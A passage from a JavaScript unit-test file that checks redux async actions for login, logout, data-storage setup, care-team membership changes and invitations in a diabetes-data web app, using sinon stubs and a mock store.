      expect(isTSA(action)).to.be.true;
    });
    const store = mockStore(initialState);
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.login.calledWith(creds)).to.be.true;
    expect(api.user.get.callCount).to.equal(1);
    expect(trackMetric.calledWith('Logged In')).to.be.true;
  });

  it('should trigger LOGIN_SUCCESS and it should redirect a clinician with one clinic and no DSA or shared member accounts to the clinic workspace view', () => {
    setAPIData({
      user: { userid: 27, roles: ['clinic'], profile: { clinic: true, patient: undefined }, emailVerified: true },
      clinics: [
        {
clinic: { id: 'clinic123', name: 'Clinic One' } },
      ],
      patients: [],
    });
    const expectedActions = [
      { type: 'LOGIN_REQUEST' },
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
      { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
      { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [
        { clinic: { id: 'clinic123', name: 'Clinic One' } },
      ] }},
      { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
      { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }},
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }},
      { type: 'LOGIN_SUCCESS', payload: { user } },
      { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/clinic-workspace'] } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    const store = mockStore(initialState);
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.login.calledWith(creds)).to.be.true;
    expect(api.user.get.callCount).to.equal(1);
    expect(trackMetric.calledWith('Logged In')).to.be.true;
  });
});

it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a single relationship containing non-empty clinic object to the workspaces view', () => {
  setAPIData({
    user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true },
    clinics: [
      { clinic: { id: 'clinic123', name: 'My Clinic' } },
    ],
    invites: [],
    patients: [],
  });
  const expectedActions = [
    { type: 'LOGIN_REQUEST' },
    { type: 'FETCH_USER_REQUEST' },
    { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
    { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
    { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [
      { clinic: { id: 'clinic123', name: 'My Clinic' } },
    ] }},
    { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
    { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }},
    { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
    { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }},
    { type: 'LOGIN_SUCCESS', payload: { user } },
    { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/clinic-workspace'] } }
  ];
  _.each(expectedActions, (action) => {
    expect(isTSA(action)).to.be.true;
  });
  const store = mockStore(initialState);
  store.dispatch(async.login(api, creds));
  const actions = store.getActions();
  expect(actions).to.eql(expectedActions);
  expect(api.user.login.calledWith(creds)).to.be.true;
  expect(api.user.get.callCount).to.equal(1);
  expect(trackMetric.calledWith('Logged In')).to.be.true;
});

// Failure modes for the post-login clinician fetches; each surfaces as a
// LOGIN_FAILURE followed by a logout and data-worker cleanup.
context('fetching clinic invites, associated clinics, or associated patients failures', () => {
  it('should trigger LOGIN_FAILURE with appropriate messaging for a failed login request due to error fetching invites', () => {
    setAPIData({
      user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true },
      invitesError: {status: 400, body: 'Error!'},
      invites: [],
      patients: [],
      clinics: [
        { clinic: { id: 'clinic123' } },
      ],
    });
    let err = new Error(ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES);
    err.status = 400;
    let expectedActions = [
      { type: 'LOGIN_REQUEST' },
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
      { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
      { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [{ clinic: { id: 'clinic123' } }] }},
      { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
      { type: 'FETCH_CLINICIAN_INVITES_FAILURE', error: err, meta: { apiError: {status: 400, body: 'Error!'}}},
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }},
      { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}},
      { type: 'LOGOUT_REQUEST', },
      {
        meta: {
          WebWorker: true,
          origin: 'http://localhost:9876',
          patientId: null,
          worker: 'data',
        },
        payload: {
          predicate:
undefined,
        },
        type: 'DATA_WORKER_REMOVE_DATA_REQUEST',
      },
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    // Error instances are compared by message, then copied into the
    // expectations so the deep-equality check below can pass.
    expect(actions[6].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES });
    expect(actions[9].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICIAN_INVITES });
    expectedActions[6].error = actions[6].error;
    expectedActions[9].error = actions[9].error;
    expect(actions).to.eql(expectedActions);
  });

  it('should trigger LOGIN_FAILURE with appropriate messaging for a failed login request due to error fetching clinics', () => {
    setAPIData({
      user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true },
      clinicsError: {status: 400, body: 'Error!'},
      clinics: [],
      patients: [],
    });
    let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN);
    err.status = 400;
    let expectedActions = [
      { type: 'LOGIN_REQUEST' },
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
      { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
      { type: 'GET_CLINICS_FOR_CLINICIAN_FAILURE', error: err, meta: { apiError: {status: 400, body: 'Error!'}}},
      { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
      { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }},
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }},
      { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}},
      { type: 'LOGOUT_REQUEST', },
      {
        meta: {
          WebWorker: true,
          origin: 'http://localhost:9876',
          patientId: null,
          worker: 'data',
        },
        payload: {
          predicate: undefined,
        },
        type: 'DATA_WORKER_REMOVE_DATA_REQUEST',
      },
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    expect(actions[4].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN });
    expect(actions[9].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN });
    expectedActions[4].error = actions[4].error;
    expectedActions[9].error = actions[9].error;
    expect(actions).to.eql(expectedActions);
  });

  it('should trigger LOGIN_FAILURE with appropriate messaging for a failed login request due to error fetching associated patient accounts', () => {
    setAPIData({
      user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true },
      patientsError: {status: 400, body: 'Error!'},
      clinics: [],
      invites: [],
      patients: [],
    });
    let err = new Error(ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS);
    err.status = 400;
    let expectedActions = [
      { type: 'LOGIN_REQUEST' },
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
      { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
      { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }},
      { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
      { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }},
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_FAILURE', error: err, meta: { apiError: {status: 400, body: 'Error!'}}},
      { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}},
      { type: 'LOGOUT_REQUEST', },
      {
        meta: {
          WebWorker: true,
          origin: 'http://localhost:9876',
          patientId: null,
          worker: 'data',
        },
        payload: {
          predicate: undefined,
        },
        type: 'DATA_WORKER_REMOVE_DATA_REQUEST',
      },
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    expect(actions[8].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS });
    expect(actions[9].error).to.deep.include({ message:
ErrorMessages.ERR_FETCHING_ASSOCIATED_ACCOUNTS });
    expectedActions[8].error = actions[8].error;
    expectedActions[9].error = actions[9].error;
    expect(actions).to.eql(expectedActions);
  });
});
});

it('[400] should trigger LOGIN_FAILURE and it should call login once and user.get zero times for a failed login request', () => {
  let creds = { username: 'bruce', password: '<PASSWORD>' };
  let user = { id: 27 };
  let api = {
    user: {
      login: sinon.stub().callsArgWith(2, {status: 400, body: 'Error!'}),
      get: sinon.stub()
    },
    clinics: {
      getClinicianInvites: sinon.stub().callsArgWith(1, null, []),
      getClinicsForClinician: sinon.stub().callsArgWith(2, null, []),
    },
  };
  let err = new Error(ErrorMessages.ERR_LOGIN);
  err.status = 400;
  let expectedActions = [
    { type: 'LOGIN_REQUEST' },
    { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 400, body: 'Error!'}}}
  ];
  _.each(expectedActions, (action) => {
    expect(isTSA(action)).to.be.true;
  });
  let store = mockStore({ blip: initialState });
  store.dispatch(async.login(api, creds));
  const actions = store.getActions();
  expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_LOGIN });
  expectedActions[1].error = actions[1].error;
  expect(actions).to.eql(expectedActions);
  expect(api.user.login.calledWith(creds)).to.be.true;
  expect(api.user.login.callCount).to.equal(1);
  expect(api.user.get.callCount).to.equal(0);
});

it('[401] should trigger LOGIN_FAILURE and it should call login once and user.get zero times for a failed login because of wrong password request', () => {
  let creds = { username: 'bruce', password: '<PASSWORD>' };
  let user = { id: 27 };
  let api = {
    user: {
      login: sinon.stub().callsArgWith(2, {status: 401, body: 'Wrong password!'}),
      get: sinon.stub(),
    },
    clinics: {
      getClinicianInvites: sinon.stub().callsArgWith(1, null, []),
      getClinicsForClinician: sinon.stub().callsArgWith(2, null, []),
    },
  };
  let err = new Error(ErrorMessages.ERR_LOGIN_CREDS);
  err.status = 401;
  let expectedActions = [
    { type: 'LOGIN_REQUEST' },
    { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 401, body: 'Wrong password!'}} }
  ];
  _.each(expectedActions, (action) => {
    expect(isTSA(action)).to.be.true;
  });
  let store = mockStore({ blip: initialState });
  store.dispatch(async.login(api, creds));
  const actions = store.getActions();
  expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_LOGIN_CREDS });
  expectedActions[1].error = actions[1].error;
  expect(actions).to.eql(expectedActions);
  expect(api.user.login.calledWith(creds)).to.be.true;
  expect(api.user.login.callCount).to.equal(1);
  expect(api.user.get.callCount).to.equal(0);
});

it('[403] should trigger LOGIN_FAILURE and it should call login once and user.get zero times for a failed login because of unverified e-mail', () => {
  let creds = { username: 'bruce', password: '<PASSWORD>' };
  let user = { id: 27 };
  let api = {
    user: {
      login: sinon.stub().callsArgWith(2, {status: 403, body: 'E-mail not verified!'}),
      get: sinon.stub(),
    },
    clinics: {
      getClinicianInvites: sinon.stub().callsArgWith(1, null, []),
      getClinicsForClinician: sinon.stub().callsArgWith(2, null, []),
    },
  };
  // 403 is not surfaced as an error action; the user is redirected to
  // the e-mail verification page instead.
  let err = null;
  let payload = {isLoggedIn: false, emailVerificationSent: false};
  let expectedActions = [
    { type: 'LOGIN_REQUEST' },
    { type: 'LOGIN_FAILURE', error: err, payload: payload, meta: { apiError: {status: 403, body: 'E-mail not verified!'}} },
    { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/email-verification' ], method: 'push' } }
  ];
  _.each(expectedActions, (action) => {
    expect(isTSA(action)).to.be.true;
  });
  let store = mockStore({ blip: initialState });
  store.dispatch(async.login(api, creds));
  const actions = store.getActions();
  expect(actions).to.eql(expectedActions);
  expect(api.user.login.calledWith(creds)).to.be.true;
  expect(api.user.login.callCount).to.equal(1);
  expect(api.user.get.callCount).to.equal(0);
});

it('[500 on user fetch] should trigger LOGIN_FAILURE and it should call login and user.get once for a failed user.get request', () => {
  let creds = { username: 'bruce', password: '<PASSWORD>' };
  let user = { id: 27 };
  let api = {
    user: {
      login: sinon.stub().callsArgWith(2, null),
      get: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}),
      logout: sinon.stub(),
    },
    clinics: {
      getClinicianInvites: sinon.stub().callsArgWith(1, null, []),
      getClinicsForClinician: sinon.stub().callsArgWith(2, null, []),
    },
  };
  let err = new Error(ErrorMessages.ERR_FETCHING_USER);
  err.status = 500;
  let expectedActions = [
    { type: 'LOGIN_REQUEST' },
    { type: 'FETCH_USER_REQUEST' },
    { type: 'FETCH_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } },
    { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 500, body: 'Error!'} } },
    { type: 'LOGOUT_REQUEST', },
    {
      meta: {
        WebWorker: true,
        origin: 'http://localhost:9876',
        patientId: null,
        worker: 'data',
      },
      payload: {
        predicate: undefined,
      },
      type: 'DATA_WORKER_REMOVE_DATA_REQUEST',
    },
  ];
  _.each(expectedActions, (action) => {
    expect(isTSA(action)).to.be.true;
  });
  let store = mockStore({ blip: initialState });
  store.dispatch(async.login(api, creds));
  const actions = store.getActions();
  expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_USER });
  expectedActions[2].error = actions[2].error;
  expect(actions[3].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_USER });
  expectedActions[3].error = actions[3].error;
  expect(actions).to.eql(expectedActions);
  expect(api.user.login.calledWith(creds)).to.be.true;
  expect(api.user.login.callCount).to.equal(1);
  expect(api.user.get.callCount).to.equal(1);
});

it('[500 on patient fetch] should trigger LOGIN_FAILURE and it should call login, user.get, and patient.get once for a failed patient.get request', () => {
  let creds = { username: 'bruce', password: '<PASSWORD>' };
  let user = { id: 27, profile: { patient: true}, emailVerified: true };
  let api = {
    patient: {
      get: sinon.stub().callsArgWith(1, {status: 500, body:
'Error!'}), }, user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT); err.status = 500; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user }}, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_FAILURE', error: err, payload: { link: null }, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'LOGIN_FAILURE', error: err, payload: null, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'LOGOUT_REQUEST', }, { meta: { WebWorker: true, origin: 'http://localhost:9876', patientId: null, worker: 'data', }, payload: { predicate: undefined, }, type: 'DATA_WORKER_REMOVE_DATA_REQUEST', }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions[4].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT }); expectedActions[4].error = actions[4].error; expect(actions[5].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT }); expectedActions[5].error = actions[5].error; expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.login.callCount).to.equal(1); expect(api.user.get.callCount).to.equal(1); expect(api.patient.get.callCount).to.equal(1); }); }); describe('logout', () => { it('should trigger LOGOUT_SUCCESS and it should call logout once for a successful request', () => { let api = { user: { logout: sinon.stub().callsArgWith(0, null) } }; let expectedActions = [ { type: 'LOGOUT_REQUEST' }, { type: 'DATA_WORKER_REMOVE_DATA_REQUEST', meta: { WebWorker: true, worker: 
'data', origin: 'originStub', patientId: 'abc123' }, payload: { predicate: undefined } },
      { type: 'LOGOUT_SUCCESS' },
      { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/' ], method: 'push' } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: { ...initialState, currentPatientInViewId: 'abc123' } });
    store.dispatch(async.logout(api));
    const actions = store.getActions();
    // The worker action's origin is environment-dependent, so it is stubbed
    // out before the deep comparison.
    actions[1].meta.origin = 'originStub';
    expect(actions).to.eql(expectedActions);
    expect(api.user.logout.callCount).to.equal(1);
    expect(trackMetric.calledWith('Logged Out')).to.be.true;
  });
});

// Tests for the setupDataStorage async action (patient profile creation).
describe('setupDataStorage', () => {
  it('should trigger SETUP_DATA_STORAGE_SUCCESS and it should call setupDataStorage once for a successful request', () => {
    let loggedInUserId = 500;
    let patient = { userid: 27, name: 'Bruce' };
    let api = {
      patient: {
        post: sinon.stub().callsArgWith(1, null, patient)
      }
    };
    let expectedActions = [
      { type: 'SETUP_DATA_STORAGE_REQUEST' },
      { type: 'SETUP_DATA_STORAGE_SUCCESS', payload: { userId: loggedInUserId, patient: patient } },
      { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients/27/data' ], method: 'push' } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } });
    let store = mockStore(initialStateForTest);
    store.dispatch(async.setupDataStorage(api, patient));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.patient.post.calledWith(patient)).to.be.true;
    expect(api.patient.post.callCount).to.equal(1);
    expect(trackMetric.calledWith('Created Profile')).to.be.true;
  });

  it('should trigger SETUP_DATA_STORAGE_FAILURE and it should call setupDataStorage once for a failed request', () => {
    let loggedInUserId = 500;
    let patient = { id: 27, name: 'Bruce' };
    let api = {
      patient: {
        post: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'})
      }
    };
    let err = new Error(ErrorMessages.ERR_DSA_SETUP);
    err.status = 500;
    let expectedActions = [
      { type: 'SETUP_DATA_STORAGE_REQUEST' },
      { type: 'SETUP_DATA_STORAGE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } });
    let store = mockStore(initialStateForTest);
    store.dispatch(async.setupDataStorage(api, patient));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DSA_SETUP });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.patient.post.calledWith(patient)).to.be.true;
    expect(api.patient.post.callCount).to.equal(1);
  });
});

// Tests for leaving another user's care team.
describe('removeMembershipInOtherCareTeam', () => {
  it('should trigger REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_SUCCESS and it should call leaveGroup and patient.getAll once for a successful request', () => {
    let patientId = 27;
    let patients = [
      { id: 200 },
      { id: 101 }
    ]
    let api = {
      access: {
        leaveGroup: sinon.stub().callsArgWith(1, null)
      },
      user: {
        getAssociatedAccounts: sinon.stub().callsArgWith(0, null, { patients })
      },
    };
    let expectedActions = [
      { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_REQUEST' },
      { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_SUCCESS', payload: { removedPatientId: patientId } },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.removeMembershipInOtherCareTeam(api, patientId, callback));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.access.leaveGroup.calledWith(patientId)).to.be.true;
    expect(api.access.leaveGroup.callCount).to.equal(1)
expect(api.user.getAssociatedAccounts.callCount).to.equal(1);
    // assert callback contains no error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, null);
  });

  it('should trigger REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_FAILURE and it should call removeMembershipInOtherCareTeam once for a failed request', () => {
    let patientId = 27;
    let error = {status: 500, body: 'Error!'};
    let api = {
      access: {
        leaveGroup: sinon.stub().callsArgWith(1, error)
      }
    };
    let err = new Error(ErrorMessages.ERR_REMOVING_MEMBERSHIP);
    err.status = 500;
    let expectedActions = [
      { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_REQUEST' },
      { type: 'REMOVE_MEMBERSHIP_IN_OTHER_CARE_TEAM_FAILURE', error: err, meta: { apiError: error } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.removeMembershipInOtherCareTeam(api, patientId, callback));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REMOVING_MEMBERSHIP });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.access.leaveGroup.calledWith(patientId)).to.be.true;
    expect(api.access.leaveGroup.callCount).to.equal(1);
    // assert callback contains the error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, error);
  });
});

// Tests for removing a member from the logged-in user's own care team.
describe('removeMemberFromTargetCareTeam', () => {
  it('should trigger REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_SUCCESS and it should call api.access.removeMember and callback once for a successful request', () => {
    let memberId = 27;
    let patientId = 456;
    let patient = { id: 546, name: 'Frank' };
    let api = {
      access: {
        removeMember: sinon.stub().callsArgWith(1, null)
      },
      patient: {
        get: sinon.stub().callsArgWith(1, null, patient)
      }
    };
    let expectedActions = [
      { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_REQUEST' },
      { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_SUCCESS', payload: { removedMemberId: memberId } },
      { type: 'FETCH_PATIENT_REQUEST' },
      { type: 'FETCH_PATIENT_SUCCESS', payload: { patient: patient } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.removeMemberFromTargetCareTeam(api, patientId, memberId, callback));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.access.removeMember.withArgs(memberId).callCount).to.equal(1);
    expect(api.patient.get.withArgs(patientId).callCount).to.equal(1);
    // assert callback contains no error, and the memberId
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, null, memberId);
  });

  it('should trigger REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_FAILURE and it should call api.access.removeMember and callback once with error for a failed request', () => {
    let memberId = 27;
    let patientId = 420;
    const error = {
      status: 500,
      body: 'Error!'
};
    let api = {
      access: {
        removeMember: sinon.stub().callsArgWith(1, error)
      }
    };
    let err = new Error(ErrorMessages.ERR_REMOVING_MEMBER);
    err.status = 500;
    let expectedActions = [
      { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_REQUEST' },
      { type: 'REMOVE_MEMBER_FROM_TARGET_CARE_TEAM_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.removeMemberFromTargetCareTeam(api, patientId, memberId, callback));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REMOVING_MEMBER });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.access.removeMember.calledWith(memberId)).to.be.true;
    // assert callback contains the error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, error, memberId);
  });
});

// Tests for sending a care-team invitation.
describe('sendInvite', () => {
  it('should trigger SEND_INVITE_SUCCESS and it should call api.invitation.send and callback once for a successful request', () => {
    let email = '<EMAIL>';
    let permissions = { view: true };
    let invite = { foo: 'bar' };
    let api = {
      invitation: {
        send: sinon.stub().callsArgWith(2, null, invite)
      }
    };
    let expectedActions = [
      { type: 'SEND_INVITE_REQUEST' },
      { type: 'SEND_INVITE_SUCCESS', payload: { invite: invite } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.sendInvite(api, email, permissions, callback));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.send.calledWith(email, permissions)).to.be.true;
    // assert callback contains no error, and the invite
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, null, invite);
  });

  it('should trigger FETCH_PENDING_SENT_INVITES_REQUEST once for a successful request for a data donation account', () => {
    let email = '<EMAIL>';
    let permissions = { view: true };
    // Inviting the data-donation account also refreshes pending sent invites.
    let invite = { email: TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL };
    let api = {
      invitation: {
        send: sinon.stub().callsArgWith(2, null, invite),
        getSent: sinon.stub(),
      }
    };
    let expectedActions = [
      { type: 'SEND_INVITE_REQUEST' },
      { type: 'FETCH_PENDING_SENT_INVITES_REQUEST' },
      { type: 'SEND_INVITE_SUCCESS', payload: { invite: invite } },
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.sendInvite(api, email, permissions, callback));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.send.calledWith(email, permissions)).to.be.true;
    // assert callback contains no error, and the invite
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, null, invite);
  });

  it('should trigger SEND_INVITE_FAILURE when invite has already been sent to the e-mail', () => {
    let email = '<EMAIL>';
    let permissions = { view: true };
    const error = {
      status: 409,
      body: 'Error!'
};
    let api = {
      invitation: {
        send: sinon.stub().callsArgWith(2, error)
      }
    };
    // 409 maps to the dedicated "already sent" error message.
    let err = new Error(ErrorMessages.ERR_ALREADY_SENT_TO_EMAIL);
    err.status = 409;
    let expectedActions = [
      { type: 'SEND_INVITE_REQUEST' },
      { type: 'SEND_INVITE_FAILURE', error: err, meta: { apiError: {status: 409, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.sendInvite(api, email, permissions, callback));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ALREADY_SENT_TO_EMAIL });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.send.calledWith(email, permissions)).to.be.true;
    // assert callback contains the error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, error, undefined);
  });

  it('should trigger SEND_INVITE_FAILURE and it should call api.invitation.send and callback once with error for a failed request', () => {
    let email = '<EMAIL>';
    let permissions = { view: true };
    let invitation = { foo: 'bar' };
    const error = {
      status: 500,
      body: 'Error!'
    };
    let api = {
      invitation: {
        send: sinon.stub().callsArgWith(2, error)
      }
    };
    let err = new Error(ErrorMessages.ERR_SENDING_INVITE);
    err.status = 500;
    let expectedActions = [
      { type: 'SEND_INVITE_REQUEST' },
      { type: 'SEND_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    let store = mockStore({ blip: initialState });
    const callback = sinon.stub();
    store.dispatch(async.sendInvite(api, email, permissions, callback));
    const actions = store.getActions();
    expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_INVITE });
    expectedActions[1].error = actions[1].error;
    expect(actions).to.eql(expectedActions);
    expect(api.invitation.send.calledWith(email, permissions)).to.be.true;
    // assert callback contains the error
    sinon.assert.calledOnce(callback);
    sinon.assert.calledWithExactly(callback, error, undefined);
  });
});

// Tests for re-sending an existing invitation.
describe('resendInvite', () => {
